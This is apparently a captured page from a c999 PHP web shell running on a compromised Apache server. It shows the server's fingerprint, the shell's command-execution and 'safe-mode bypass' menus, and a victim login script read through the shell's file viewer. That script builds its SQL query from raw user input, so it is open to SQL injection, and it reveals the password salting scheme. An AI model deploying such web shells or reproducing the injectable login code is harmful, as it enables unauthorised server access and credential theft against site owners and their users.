Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reg-tools/api/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php include("../include/class.mysqldb.php"); include("../include/config.inc.php"); if ($_REQUEST["action"] == "login") { $passwd = md5("O]O" . $_REQUEST["pass"] . "O[O"); //$sql = "SELECT * FROM ums2.umuser WHERE UsLogin = '" . $_REQUEST["user"] . "' AND UsPassword = '" . $passwd . "' AND UsActive = '1' AND UsAdmin = '1'"; $sql = "SELECT * FROM ums2.umuser uu LEFT JOIN ums2.umusergroup uug ON uug.UgUsId = uu.UsId WHERE uu.UsLogin = '" . $_REQUEST["user"] . "' AND uu.UsPassword = '" . $passwd . "' AND uu.UsActive = '1' AND (uu.UsAdmin = '1' OR uug.UgGpID = '70070')"; $link->query($sql); //$data = $link->getnext(); $permission = 0; $usName; $usLogin; if ($link->num_rows()) { while ($data = $link->getnext()) { if($data->UsAdmin == "1" || $data->UgGpID == "70070"){ $permission = 1; $usName = $data->UsName; $usLogin = $data->UsLogin; } } } if ($permission == "1") { $_SESSION["isLogin"] = true; $_SESSION["UsName"] = $usName; $_SESSION["UsLogin"] = $usLogin; echo "Login success"; } else { echo "Login failed"; } } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |